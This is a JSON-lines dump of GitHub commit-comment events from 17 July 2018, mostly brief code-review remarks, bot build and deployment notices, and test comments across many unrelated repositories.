{"id":"7975236090","type":"CommitCommentEvent","actor":{"login":"ThiefMaster"},"repo":{"name":"errikos/indico"},"payload":{"comment":{"id":29731644,"position":50,"line":509,"path":"indico/modules/events/contributions/controllers/management.py","commit_id":"d66b2b239df637837bbc4868990920a19fad688f","created_at":"2018-07-17T08:45:06Z","updated_at":"2018-07-17T08:45:06Z","author_association":"NONE","body":"instead of using `event_core_settings` i would add a new `contribution_settings` EventSettingsProxy in `indico/modules/contributions/__init__.py`"}},"created_at":"2018-07-17T08:45:06Z"}
{"id":"7975239601","type":"CommitCommentEvent","actor":{"login":"SingHo2016"},"repo":{"name":"DabKickDeveloper/DKPlayer"},"payload":{"comment":{"id":29731655,"position":204,"line":1578,"path":"dkvideoplayer/src/main/java/com/dabkick/dkvideoplayer/livesession/stage/VideoManager.java","commit_id":"59477cb7fbd36da33b6da662cc998e89d2aff728","created_at":"2018-07-17T08:45:45Z","updated_at":"2018-07-17T08:45:45Z","author_association":"NONE","body":"If we are still resyncing, don't go into code below here because that assumes that the user has loaded.  But if it's still resyncing, then it's not exactly ready to play, so should not treat as loaded"}},"created_at":"2018-07-17T08:45:45Z"}
{"id":"7975242994","type":"CommitCommentEvent","actor":{"login":"ozasadnyy"},"repo":{"name":"davinkevin/hoverboard"},"payload":{"comment":{"id":29731671,"position":49,"line":231,"path":"src/elements/dialogs/session-details.html","commit_id":"c63bfb3893c936149bfc03ebbe48a15b23278e47","created_at":"2018-07-17T08:46:24Z","updated_at":"2018-07-17T08:46:24Z","author_association":"NONE","body":"I would rather check if the first element is NOT an object than do this modification. In another case, return what we received."}},"created_at":"2018-07-17T08:46:24Z"}
{"id":"7975244657","type":"CommitCommentEvent","actor":{"login":"bmack"},"repo":{"name":"cedricziel/vhs"},"payload":{"comment":{"id":29731675,"position":null,"line":null,"path":null,"commit_id":"482be660bb7d18492b1d04c912e2847e9f18f48f","created_at":"2018-07-17T08:46:44Z","updated_at":"2018-07-17T08:46:44Z","author_association":"NONE","body":"AFAIK this has been fixed in master of EXT:vhs.\r\n\r\nhttps://github.com/FluidTYPO3/vhs/blob/development/composer.json\r\n\r\nworks for us (although we just got rid of VHS in TYPO3 v9)"}},"created_at":"2018-07-17T08:46:44Z"}
{"id":"7975245614","type":"CommitCommentEvent","actor":{"login":"Huu-Sang"},"repo":{"name":"qiyeboy/SpiderBook"},"payload":{"comment":{"id":29731677,"position":null,"line":null,"path":null,"commit_id":"c3d1335bbf0d73ab0ae06139d7b05fc19c7d9449","created_at":"2018-07-17T08:46:54Z","updated_at":"2018-07-17T08:46:54Z","author_association":"NONE","body":"你好。我按照你上面的代码，重来一遍，发现我的有问题。代码如下，请教一下这是咋回事。刚开始学习，有点儿懵逼，有点儿慌。。。\r\n![12](https://user-images.githubusercontent.com/37071765/42806363-e5f1a60a-89e0-11e8-97c3-3707cbfc1932.JPG)\r\n"}},"created_at":"2018-07-17T08:46:54Z"}
{"id":"7975248514","type":"CommitCommentEvent","actor":{"login":"SingHo2016"},"repo":{"name":"DabKickDeveloper/DKPlayer"},"payload":{"comment":{"id":29731681,"position":248,"line":1637,"path":"dkvideoplayer/src/main/java/com/dabkick/dkvideoplayer/livesession/stage/VideoManager.java","commit_id":"59477cb7fbd36da33b6da662cc998e89d2aff728","created_at":"2018-07-17T08:47:26Z","updated_at":"2018-07-17T08:47:26Z","author_association":"NONE","body":"On first load, play if the video you're opening is in play state, pause if in paused state.  The reason is that it makes sure that the state is correct and that the users don't think the video is paused when the video is actually supposed to be playing"}},"created_at":"2018-07-17T08:47:26Z"}
{"id":"7975248600","type":"CommitCommentEvent","actor":{"login":"LIULi-VVET"},"repo":{"name":"grpc/grpc-java"},"payload":{"comment":{"id":29731682,"position":null,"line":null,"path":null,"commit_id":"146b6006b3cc003f68100d10da4ffce8225cc31d","created_at":"2018-07-17T08:47:27Z","updated_at":"2018-07-17T08:47:27Z","author_association":"NONE","body":"But now the generated code can't be compiled\r\n    @Override\r\n    public io.grpc.stub.StreamObserver<Req> invoke( io.grpc.stub.StreamObserver<Resp> esponseObserver)\r\n@Override is not allowed where implement  interface method"}},"created_at":"2018-07-17T08:47:27Z"}
{"id":"7975250403","type":"CommitCommentEvent","actor":{"login":"SingHo2016"},"repo":{"name":"DabKickDeveloper/DKPlayer"},"payload":{"comment":{"id":29731687,"position":266,"line":1702,"path":"dkvideoplayer/src/main/java/com/dabkick/dkvideoplayer/livesession/stage/VideoManager.java","commit_id":"59477cb7fbd36da33b6da662cc998e89d2aff728","created_at":"2018-07-17T08:47:46Z","updated_at":"2018-07-17T08:47:46Z","author_association":"NONE","body":"This callback updates loaded users\r\n"}},"created_at":"2018-07-17T08:47:46Z"}
{"id":"7975254813","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"DronMDF/zold-lazy-node"},"payload":{"comment":{"id":29731695,"position":null,"line":null,"path":null,"commit_id":"f1f05b6a32cf04102a65004ee2806b74cbbb5b9c","created_at":"2018-07-17T08:48:36Z","updated_at":"2018-07-17T08:48:36Z","author_association":"COLLABORATOR","body":"Puzzle `66-a648729e` discovered in   [`node/app.py`](  https://github.com/DronMDF/zold-lazy-node/blob/master/node/app.py)   and submitted as #79. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-17T08:48:36Z"}
{"id":"7975255005","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"DronMDF/zold-lazy-node"},"payload":{"comment":{"id":29731696,"position":null,"line":null,"path":null,"commit_id":"f1f05b6a32cf04102a65004ee2806b74cbbb5b9c","created_at":"2018-07-17T08:48:39Z","updated_at":"2018-07-17T08:48:39Z","author_association":"COLLABORATOR","body":"Puzzle `66-612c9792` discovered in   [`node/app.py`](  https://github.com/DronMDF/zold-lazy-node/blob/master/node/app.py)   and submitted as #80. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-17T08:48:39Z"}
{"id":"7975255194","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"DronMDF/zold-lazy-node"},"payload":{"comment":{"id":29731697,"position":null,"line":null,"path":null,"commit_id":"f1f05b6a32cf04102a65004ee2806b74cbbb5b9c","created_at":"2018-07-17T08:48:40Z","updated_at":"2018-07-17T08:48:40Z","author_association":"COLLABORATOR","body":"Puzzle `66-7e85ada8` discovered in   [`node/app.py`](  https://github.com/DronMDF/zold-lazy-node/blob/master/node/app.py)   and submitted as #81. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-17T08:48:40Z"}
{"id":"7975260724","type":"CommitCommentEvent","actor":{"login":"AshMenhennett"},"repo":{"name":"AshMenhennett/Forum"},"payload":{"comment":{"id":29731707,"position":null,"line":null,"path":null,"commit_id":"32f8b1604be420e484488fd7ad0890a2a3837624","created_at":"2018-07-17T08:49:40Z","updated_at":"2018-07-17T08:49:40Z","author_association":"OWNER","body":"Why are we going to support older versions of PHP? 😂"}},"created_at":"2018-07-17T08:49:40Z"}
{"id":"7975268496","type":"CommitCommentEvent","actor":{"login":"fslnote"},"repo":{"name":"fslnote/choba"},"payload":{"comment":{"id":29731715,"position":null,"line":null,"path":null,"commit_id":"e9c19484218f247c471a3db4339b5a70b259d73d","created_at":"2018-07-17T08:51:06Z","updated_at":"2018-07-17T08:51:06Z","author_association":"OWNER","body":"Brilliant!"}},"created_at":"2018-07-17T08:51:06Z"}
{"id":"7975268924","type":"CommitCommentEvent","actor":{"login":"jeromebrunet"},"repo":{"name":"superna9999/linux"},"payload":{"comment":{"id":29731716,"position":26,"line":1555,"path":"drivers/clk/meson/gxbb.c","commit_id":"91019aa6ce723b3374aa996b834dde0c83e0d8f7","created_at":"2018-07-17T08:51:10Z","updated_at":"2018-07-17T08:51:10Z","author_association":"NONE","body":"Tu utilise deja ce bit comme \"bypass\" dans ton driver vid_pll ... je pense que c'est mieux ici"}},"created_at":"2018-07-17T08:51:10Z"}
{"id":"7975270646","type":"CommitCommentEvent","actor":{"login":"joelshepherd"},"repo":{"name":"joelshepherd/tabliss"},"payload":{"comment":{"id":29731717,"position":5,"line":62,"path":"src/app/settings/System.tsx","commit_id":"3e8ee7451d56bbf526db605e686fd8f58a41e24b","created_at":"2018-07-17T08:51:29Z","updated_at":"2018-07-17T08:51:29Z","author_association":"OWNER","body":"Ah I see, thanks for explaining that! Do you think geographical would be better, in case Hong Kong localisations are introduced in the future?"}},"created_at":"2018-07-17T08:51:29Z"}
{"id":"7975272150","type":"CommitCommentEvent","actor":{"login":"penn5"},"repo":{"name":"Lyudmila17/android_device_motorola_athene"},"payload":{"comment":{"id":29731718,"position":null,"line":null,"path":null,"commit_id":"116ac8dbff8a99890f39ed681cea8b71dd209c8a","created_at":"2018-07-17T08:51:45Z","updated_at":"2018-07-17T08:51:45Z","author_association":"NONE","body":"This commit is insufficient to mount /oem as /vendor. The main fstab must also be changed"}},"created_at":"2018-07-17T08:51:45Z"}
{"id":"7975272420","type":"CommitCommentEvent","actor":{"login":"vbonvin"},"repo":{"name":"ijustbsd/ipt_connect"},"payload":{"comment":{"id":29731719,"position":5,"line":15,"path":"ipt_connect/IPTdev/templates/IPTdev/tournament_overview.html","commit_id":"2ee47562538f4a24a73a9fdf9962c7390130be5a","created_at":"2018-07-17T08:51:48Z","updated_at":"2018-07-17T08:51:48Z","author_association":"NONE","body":"Is there another place where you use either number of full_name separately? If not, then you should concatenate these two variables"}},"created_at":"2018-07-17T08:51:48Z"}
{"id":"7975276210","type":"CommitCommentEvent","actor":{"login":"qpautrat"},"repo":{"name":"Evaneos/burrow-bundle"},"payload":{"comment":{"id":29731722,"position":12,"line":52,"path":"src/DependencyInjection/Configuration.php","commit_id":"a6eae780906328a72258c750d9e923c1f9b01e3e","created_at":"2018-07-17T08:52:31Z","updated_at":"2018-07-17T08:52:31Z","author_association":"MEMBER","body":"Yes you're right."}},"created_at":"2018-07-17T08:52:31Z"}
{"id":"7975278479","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29731724,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-17T08:52:57Z","updated_at":"2018-07-17T08:52:57Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-17T08:52:57Z"}
{"id":"7975278503","type":"CommitCommentEvent","actor":{"login":"vbonvin"},"repo":{"name":"ijustbsd/ipt_connect"},"payload":{"comment":{"id":29731725,"position":26,"line":43,"path":"ipt_connect/IPTdev/views.py","commit_id":"2ee47562538f4a24a73a9fdf9962c7390130be5a","created_at":"2018-07-17T08:52:58Z","updated_at":"2018-07-17T08:52:58Z","author_association":"NONE","body":"Why adding tournament-related variables here?"}},"created_at":"2018-07-17T08:52:58Z"}
{"id":"7975279751","type":"CommitCommentEvent","actor":{"login":"cedricziel"},"repo":{"name":"cedricziel/vhs"},"payload":{"comment":{"id":29731729,"position":null,"line":null,"path":null,"commit_id":"482be660bb7d18492b1d04c912e2847e9f18f48f","created_at":"2018-07-17T08:53:12Z","updated_at":"2018-07-17T08:53:12Z","author_association":"OWNER","body":"The related release is 5.0.1."}},"created_at":"2018-07-17T08:53:12Z"}
{"id":"7975285254","type":"CommitCommentEvent","actor":{"login":"Bodacious"},"repo":{"name":"DMPRoadmap/roadmap"},"payload":{"comment":{"id":29731733,"position":null,"line":null,"path":null,"commit_id":"8e719eca9261762b458027841696c3e55c6eb138","created_at":"2018-07-17T08:54:12Z","updated_at":"2018-07-17T08:54:12Z","author_association":"NONE","body":"@briri Just wanted to flag this one to you. **jquery-ui** was installed previously, but hadn't been loaded.\r\n\r\nWhen I loaded it in for the sortable module, it included the jQuery UI `tooltip()` plugin which interrupted the Bootstrap `tooltip()` plugin"}},"created_at":"2018-07-17T08:54:12Z"}
{"id":"7975290946","type":"CommitCommentEvent","actor":{"login":"ssuetai2018"},"repo":{"name":"ashhadanwar/Random-Shapes"},"payload":{"comment":{"id":29731744,"position":null,"line":null,"path":null,"commit_id":"b281b7e4d85cddbcd2f35845d45439ed8b194625","created_at":"2018-07-17T08:55:14Z","updated_at":"2018-07-17T08:55:14Z","author_association":"NONE","body":"Your work is perfect dear, love to see you are doing amazing. May Allah succeed you, \r\n"}},"created_at":"2018-07-17T08:55:14Z"}
{"id":"7975292480","type":"CommitCommentEvent","actor":{"login":"penn5"},"repo":{"name":"Lyudmila17/android_device_motorola_athene"},"payload":{"comment":{"id":29731749,"position":16,"line":304,"path":"rootdir/etc/init.qcom.rc","commit_id":"a25d2694eecaac948a6703153278cb810c043522","created_at":"2018-07-17T08:55:31Z","updated_at":"2018-07-17T08:55:31Z","author_association":"NONE","body":"Surely this relative path is called before /vendor is even mounted; I believe this line runs in ramdisk, so this change is not required and may even cause a failure while mounting."}},"created_at":"2018-07-17T08:55:31Z"}
{"id":"7975293772","type":"CommitCommentEvent","actor":{"login":"OrionUnix"},"repo":{"name":"OrionUnix/webhooks_airdrop"},"payload":{"comment":{"id":29731752,"position":null,"line":null,"path":null,"commit_id":"790f606de3472e5e0eaf68746339dd0fac1db9ec","created_at":"2018-07-17T08:55:45Z","updated_at":"2018-07-17T08:55:45Z","author_association":"OWNER","body":"#33 Mapcoin (gros projet)\r\nLien [https://mapcoin.io/airdrop](https://mapcoin.io/airdrop)\r\nRT + message : \r\n> \"#Mapcointoken #Mapcoin #airdrop #Blockchain #ETH #crypto and link to their website: https://www.mapcoin.io/"}},"created_at":"2018-07-17T08:55:45Z"}
{"id":"7975296864","type":"CommitCommentEvent","actor":{"login":"ZexiFangkong"},"repo":{"name":"projectpai/paicoin"},"payload":{"comment":{"id":29731757,"position":null,"line":null,"path":null,"commit_id":"2ed0727d015f46812144a69a14910a1e636c4fb2","created_at":"2018-07-17T08:56:18Z","updated_at":"2018-07-17T08:56:18Z","author_association":"NONE","body":"Excuse me, your source code base is all from Btc modification come from"}},"created_at":"2018-07-17T08:56:18Z"}
{"id":"7975305315","type":"CommitCommentEvent","actor":{"login":"dbo-odoo"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29731785,"position":null,"line":null,"path":null,"commit_id":"e8821f0519873713ba477b2c013cb0a645e6e559","created_at":"2018-07-17T08:57:52Z","updated_at":"2018-07-17T08:57:52Z","author_association":"CONTRIBUTOR","body":":tada: "}},"created_at":"2018-07-17T08:57:52Z"}
{"id":"7975307346","type":"CommitCommentEvent","actor":{"login":"OnIonFFF"},"repo":{"name":"how2j/hellogit"},"payload":{"comment":{"id":29731788,"position":null,"line":null,"path":null,"commit_id":"56185b22ee0ebaf04032bbb07288fb1ac8c50d35","created_at":"2018-07-17T08:58:15Z","updated_at":"2018-07-17T08:58:15Z","author_association":"NONE","body":"修改站长代码，发出合并请求"}},"created_at":"2018-07-17T08:58:15Z"}
{"id":"7975317273","type":"CommitCommentEvent","actor":{"login":"SanjanaMalandkar"},"repo":{"name":"SanjanaMalandkar/hello-world"},"payload":{"comment":{"id":29731800,"position":null,"line":null,"path":null,"commit_id":"e1da8f17bcb1df163f77b5f6d1893f5e16bfcb6c","created_at":"2018-07-17T09:00:03Z","updated_at":"2018-07-17T09:00:03Z","author_association":"OWNER","body":"hi hello"}},"created_at":"2018-07-17T09:00:03Z"}
{"id":"7975330053","type":"CommitCommentEvent","actor":{"login":"kidrane"},"repo":{"name":"conversant/disruptor"},"payload":{"comment":{"id":29731828,"position":null,"line":null,"path":null,"commit_id":"88cae3eafe996fd70775c0cc9e607a74ab3d0970","created_at":"2018-07-17T09:02:18Z","updated_at":"2018-07-17T09:02:18Z","author_association":"NONE","body":"```\r\nreturn p & (p - 1) == 0;\r\n```"}},"created_at":"2018-07-17T09:02:18Z"}
{"id":"7975330904","type":"CommitCommentEvent","actor":{"login":"iamfibre"},"repo":{"name":"iamfibre/Fibrelinks"},"payload":{"comment":{"id":29731830,"position":null,"line":null,"path":null,"commit_id":"9f3c3c7dc811b49193fe06a4e4ba097be9ca73e7","created_at":"2018-07-17T09:02:27Z","updated_at":"2018-07-17T09:02:27Z","author_association":"OWNER","body":"\r\n[readme.txt](https://github.com/iamfibre/Fibrelinks/files/2200945/readme.txt)\r\n"}},"created_at":"2018-07-17T09:02:27Z"}
{"id":"7975333310","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29731838,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-17T09:02:53Z","updated_at":"2018-07-17T09:02:53Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-17T09:02:53Z"}
{"id":"7975338731","type":"CommitCommentEvent","actor":{"login":"khusika"},"repo":{"name":"nathanchance/scripts"},"payload":{"comment":{"id":29731849,"position":null,"line":null,"path":null,"commit_id":"376e62097b07b8fd72cb0c9ddb54350571fe5ae3","created_at":"2018-07-17T09:03:53Z","updated_at":"2018-07-17T09:03:53Z","author_association":"CONTRIBUTOR","body":"build-kernel 😏"}},"created_at":"2018-07-17T09:03:53Z"}
{"id":"7975345048","type":"CommitCommentEvent","actor":{"login":"Jimph87"},"repo":{"name":"Jimph87/utpcv"},"payload":{"comment":{"id":29731855,"position":null,"line":null,"path":null,"commit_id":"4823e89c7d56f185b18cf57cee685da2fc9bc016","created_at":"2018-07-17T09:05:00Z","updated_at":"2018-07-17T09:05:00Z","author_association":"OWNER","body":"kjjkkj"}},"created_at":"2018-07-17T09:05:00Z"}
{"id":"7975353965","type":"CommitCommentEvent","actor":{"login":"sanmao2018"},"repo":{"name":"ChinaYyy/Learning-Notes"},"payload":{"comment":{"id":29731863,"position":25,"line":25,"path":"learning-kafka/kafka.md","commit_id":"945638de1ed9705e300b18172a638ac0d82bb432","created_at":"2018-07-17T09:06:39Z","updated_at":"2018-07-17T09:06:39Z","author_association":"NONE","body":"这个包和kafka_python 还有pykafka有什么区别，对kafka的那些验证都支持吗？"}},"created_at":"2018-07-17T09:06:39Z"}
{"id":"7975361679","type":"CommitCommentEvent","actor":{"login":"sanmao2018"},"repo":{"name":"ChinaYyy/Learning-Notes"},"payload":{"comment":{"id":29731868,"position":16,"line":16,"path":"learning-kafka/kafka.md","commit_id":"945638de1ed9705e300b18172a638ac0d82bb432","created_at":"2018-07-17T09:08:01Z","updated_at":"2018-07-17T09:08:01Z","author_association":"NONE","body":"你是从官网下的包吗？怎么还需要更新这个"}},"created_at":"2018-07-17T09:08:01Z"}
{"id":"7975374253","type":"CommitCommentEvent","actor":{"login":"godo13405"},"repo":{"name":"godo13405/dragon-spellbook"},"payload":{"comment":{"id":29731887,"position":null,"line":null,"path":null,"commit_id":"725ceec4b07cf8ae5f3c29aec5c9d5a11bf22475","created_at":"2018-07-17T09:10:21Z","updated_at":"2018-07-17T09:10:21Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/48c4c854-767b-47f7-b2ec-7f79e14cf35d?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/7ddab936-a781-49fa-99fc-742d790aea96?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\") deployed [dragon-spellbook](https://github.com/godo13405/dragon-spellbook/releases/tag/deploy-ibm-yp-eu-gb-UXCalibur-prod-20180717-091019 \"deploy-ibm-yp-eu-gb-UXCalibur-prod-20180717-091019\") to [prod](https://console.bluemix.net/apps/aaffb021-5482-4ff5-bc14-26c90db6686c?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:UXCalibur:prod\"), including this commit"}},"created_at":"2018-07-17T09:10:21Z"}
{"id":"7975375941","type":"CommitCommentEvent","actor":{"login":"garth-wells"},"repo":{"name":"FEniCS/dolfinx"},"payload":{"comment":{"id":29731888,"position":5,"line":49,"path":"python/dolfin/__init__.py","commit_id":"f4aef3d86c0caa8568bfda3eb7b411cbb1988e59","created_at":"2018-07-17T09:10:41Z","updated_at":"2018-07-17T09:10:41Z","author_association":"MEMBER","body":"Let's avoid importing into the top level."}},"created_at":"2018-07-17T09:10:41Z"}
{"id":"7975382005","type":"CommitCommentEvent","actor":{"login":"garth-wells"},"repo":{"name":"FEniCS/dolfinx"},"payload":{"comment":{"id":29731895,"position":1,"line":1,"path":"python/dolfin/io/hdf5file.py","commit_id":"f4aef3d86c0caa8568bfda3eb7b411cbb1988e59","created_at":"2018-07-17T09:11:49Z","updated_at":"2018-07-17T09:11:49Z","author_association":"MEMBER","body":"Can get all the io classes into `python/dolfin/io.py`?"}},"created_at":"2018-07-17T09:11:49Z"}
{"id":"7975385779","type":"CommitCommentEvent","actor":{"login":"mrluoqiuyu"},"repo":{"name":"digitalClass/web_page"},"payload":{"comment":{"id":29731898,"position":4,"line":24,"path":"templates/homepage.html","commit_id":"f15e3f24a307a11b7eff3cc9efabf32e99d59e37","created_at":"2018-07-17T09:12:29Z","updated_at":"2018-07-17T09:12:29Z","author_association":"NONE","body":"k"}},"created_at":"2018-07-17T09:12:29Z"}
{"id":"7975392579","type":"CommitCommentEvent","actor":{"login":"wfy815775"},"repo":{"name":"wfy815775/Dubbo_demo"},"payload":{"comment":{"id":29731907,"position":null,"line":null,"path":null,"commit_id":"508c95cbf4e07f54390bcdf44e0fe70d2e26abff","created_at":"2018-07-17T09:13:42Z","updated_at":"2018-07-17T09:13:42Z","author_association":"OWNER","body":"测试"}},"created_at":"2018-07-17T09:13:42Z"}
{"id":"7975393284","type":"CommitCommentEvent","actor":{"login":"wfy815775"},"repo":{"name":"wfy815775/Dubbo_demo"},"payload":{"comment":{"id":29731910,"position":null,"line":null,"path":null,"commit_id":"508c95cbf4e07f54390bcdf44e0fe70d2e26abff","created_at":"2018-07-17T09:13:50Z","updated_at":"2018-07-17T09:13:50Z","author_association":"OWNER","body":"测试"}},"created_at":"2018-07-17T09:13:50Z"}
{"id":"7975402040","type":"CommitCommentEvent","actor":{"login":"fredericobormann"},"repo":{"name":"fredericobormann/MensaViewer"},"payload":{"comment":{"id":29731925,"position":null,"line":null,"path":null,"commit_id":"5ff85fa824cec049156f191a87fe2a99da7bee1f","created_at":"2018-07-17T09:15:24Z","updated_at":"2018-07-17T09:15:24Z","author_association":"OWNER","body":"closes #2 "}},"created_at":"2018-07-17T09:15:24Z"}
{"id":"7975402831","type":"CommitCommentEvent","actor":{"login":"9985134865"},"repo":{"name":"9985134865/NeosoftRepository"},"payload":{"comment":{"id":29731926,"position":5,"line":11,"path":"HIbernateProject/src/main/java/org/neosofttech/beans/App.java","commit_id":"a43156f2e35ca629c278cb4f819426c7a5fd61f2","created_at":"2018-07-17T09:15:33Z","updated_at":"2018-07-17T09:15:33Z","author_association":"OWNER","body":"Y *** re given..."}},"created_at":"2018-07-17T09:15:33Z"}
{"id":"7975405561","type":"CommitCommentEvent","actor":{"login":"china-libai"},"repo":{"name":"china-libai/china-libai.github.io"},"payload":{"comment":{"id":29731947,"position":null,"line":null,"path":null,"commit_id":"64f36f357901b9d6cb389035f13a94db5e32599f","created_at":"2018-07-17T09:16:03Z","updated_at":"2018-07-17T09:16:03Z","author_association":"OWNER","body":"域名不用了"}},"created_at":"2018-07-17T09:16:03Z"}
{"id":"7975413817","type":"CommitCommentEvent","actor":{"login":"wolfenste"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29731963,"position":12,"line":12,"path":"tests/TicTacToeTest.php","commit_id":"3ffac1b54136046406dd307d484db49ba64d8037","created_at":"2018-07-17T09:17:32Z","updated_at":"2018-07-17T09:17:32Z","author_association":"OWNER","body":"I'm not sure what to link."}},"created_at":"2018-07-17T09:17:32Z"}
{"id":"7975416329","type":"CommitCommentEvent","actor":{"login":"Suil3File"},"repo":{"name":"agilebits/onepassword-app-extension"},"payload":{"comment":{"id":29731972,"position":null,"line":null,"path":null,"commit_id":"957645559ac4366e98d6deea6db1867af7d0ac80","created_at":"2018-07-17T09:17:59Z","updated_at":"2018-07-17T09:17:59Z","author_association":"NONE","body":"9576455"}},"created_at":"2018-07-17T09:17:59Z"}
{"id":"7975424521","type":"CommitCommentEvent","actor":{"login":"Bruebaba"},"repo":{"name":"Bruebaba/savethebees4"},"payload":{"comment":{"id":29731984,"position":null,"line":null,"path":null,"commit_id":"f5934172a2295b8b283345a356c6eb87af66415f","created_at":"2018-07-17T09:19:23Z","updated_at":"2018-07-17T09:19:23Z","author_association":"OWNER","body":"Bild geändert"}},"created_at":"2018-07-17T09:19:23Z"}
{"id":"7975441047","type":"CommitCommentEvent","actor":{"login":"haskell-jp-bot"},"repo":{"name":"haskell-jp/blog"},"payload":{"comment":{"id":29732018,"position":null,"line":null,"path":null,"commit_id":"def27925509a52598717aee2cbfe722c40e53bcc","created_at":"2018-07-17T09:22:23Z","updated_at":"2018-07-17T09:22:23Z","author_association":"NONE","body":"https://circleci.com/gh/haskell-jp/blog/495/artifacts/0/root/project/generated-site/index.html"}},"created_at":"2018-07-17T09:22:23Z"}
{"id":"7975444990","type":"CommitCommentEvent","actor":{"login":"doggy8088"},"repo":{"name":"jerriep/airport-explorer-source"},"payload":{"comment":{"id":29732021,"position":null,"line":null,"path":null,"commit_id":"3505ff6ea061390c31f7dad95cc72a46f49df795","created_at":"2018-07-17T09:23:03Z","updated_at":"2018-07-17T09:23:03Z","author_association":"NONE","body":"@jerriep Does the `ForwardLimit = 2` setting both apply to **ASP.NET Core 2.0** and **ASP.NET Core 2.1**?"}},"created_at":"2018-07-17T09:23:03Z"}
{"id":"7975447856","type":"CommitCommentEvent","actor":{"login":"drupol"},"repo":{"name":"ec-europa/platform-dev"},"payload":{"comment":{"id":29732027,"position":null,"line":null,"path":null,"commit_id":"4babbdfb94340e579aed64a5c7c4a8cb94dfef65","created_at":"2018-07-17T09:23:35Z","updated_at":"2018-07-17T09:23:35Z","author_association":"MEMBER","body":"Oh I like that, thanks! :heart: "}},"created_at":"2018-07-17T09:23:35Z"}
{"id":"7975448142","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"DanGenOn/portfolio-"},"payload":{"comment":{"id":29732029,"position":584,"line":602,"path":"css/main.css","commit_id":"8ae2f669017f363bad36a78362ee723388b9da77","created_at":"2018-07-17T09:23:38Z","updated_at":"2018-07-17T09:23:38Z","author_association":"COLLABORATOR","body":"Мы выносим из wp, js, css все в skill.\r\n```css\r\n.skill {\r\n        font-size: 30px;\r\n\tmargin-left: 15%;\r\n\tmargin-top: 7%;\r\n\tflex-direction: row;\r\n\tbackground:#FFD83A;\r\n\tpadding: 50px;\r\n\tborder-top-left-radius: 50px;\r\n\tborder-bottom-left-radius: 50px;\r\n}\r\n```\r\n\r\n```css\r\n.js__skill{ \r\n    background:#FFD83A;\r\n}\r\n```"}},"created_at":"2018-07-17T09:23:38Z"}
{"id":"7975449474","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"DanGenOn/portfolio-"},"payload":{"comment":{"id":29732031,"position":584,"line":602,"path":"css/main.css","commit_id":"8ae2f669017f363bad36a78362ee723388b9da77","created_at":"2018-07-17T09:23:53Z","updated_at":"2018-07-17T09:23:53Z","author_association":"COLLABORATOR","body":"<div class=\"skill js\"/>"}},"created_at":"2018-07-17T09:23:53Z"}
{"id":"7975478168","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/RockPaperScissors"},"payload":{"comment":{"id":29732088,"position":71,"line":71,"path":"contracts/RockPaperScissors.sol","commit_id":"60e023e82e3c852b1ee309bcaa47a900a5111241","created_at":"2018-07-17T09:29:08Z","updated_at":"2018-07-17T09:29:08Z","author_association":"NONE","body":"Isn't this redundant given the 2 lines below?"}},"created_at":"2018-07-17T09:29:08Z"}
{"id":"7975478970","type":"CommitCommentEvent","actor":{"login":"leniumd"},"repo":{"name":"alarmxcore/alarmx"},"payload":{"comment":{"id":29732090,"position":null,"line":null,"path":null,"commit_id":"dbce6d2afc212d885e57715f0ff24f546640a33b","created_at":"2018-07-17T09:29:16Z","updated_at":"2018-07-17T09:29:16Z","author_association":"NONE","body":"Silence not  ~slence~"}},"created_at":"2018-07-17T09:29:16Z"}
